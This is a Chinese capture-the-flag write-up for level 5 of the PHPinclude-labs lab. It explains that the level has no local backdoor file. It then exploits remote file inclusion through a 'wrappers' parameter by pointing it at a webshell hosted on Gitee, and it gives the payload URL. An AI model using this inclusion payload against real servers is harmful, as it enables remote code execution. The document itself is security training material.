当前位置: 首页 > news >正文

[HelloCTF]PHPinclude-labs超详细WP-Level 5-http协议-2

news 来源:原创 2025/5/18 6:29:06

源码分析

  • 跟上一关一样, 没有任何变化

解题分析

  • 那变化在哪呢?

    • 其实变化在当前目录下的文件

    • 当前目录在不再有后门文件了

      • 不能再通过 127.0.0.1 和 靶机ip 来获取原本就存在的 WebShell

  • 所以需要自己在互联网上放一个 WebShell, 以便文件包含

    • 探姬贴心地已经在 Gitee 上准备好了 木马

    • https://gitee.com/Probius/PHPinclude-labs/raw/main/RFI

解题步骤

  • 使用远程文件包含, 包含上述地址, POST 传入对应参数即可

  • http://靶场ip?wrappers=gitee.com/Probius/PHPinclude-labs/raw/main/RFI

相关文章:

  • Mysql:关于命名
  • CPP从入门到入土之类和对象Ⅰ
  • LLM中lora的梯度更新策略公式解析
  • 数据恢复软件有哪些?评测哪款最好用
  • 「清华大学、北京大学」DeepSeek 课件PPT专栏
  • jmeter配件元素
  • 网络编程基础(2)
  • 导出的使用
  • YOLOv11小白的进击之路(九)创新YOLO11损失函数之NWD损失函数源码解读
  • 分布式锁的实现
  • 大数据处理最容易的开源平台
  • 【从零开始学习计算机科学】软件测试(五)白盒测试
  • [K!nd4SUS 2025] Crypto
  • 手写发布订阅模式
  • MySQL使用pxc实现高可用
  • 【软件系统架构】单体架构
  • 突破 HTML 学习瓶颈:表格、列表与表单的学习进度(一)
  • 【Opencv中的Jpeg有损压缩】
  • 功能强大的电脑硬件检测及驱动安装工具
  • 【计算机视觉】工业表计读数(3)--指针及刻度关键点识别
  • 国内规模最大女子赛艇官方赛事在沪启航,中外41支队伍逐浪
  • 汕头违建豪宅“英之园”将强拆,当地:将根据公告期内具体情况采取下一步措施
  • 冰雹造成车损能赔吗?如何理赔?机构答疑
  • 崔登荣任国家游泳队总教练
  • 习近平会见智利总统博里奇
  • 国台办:80年前台湾重归中国版图,80年后不可能让台湾分裂出去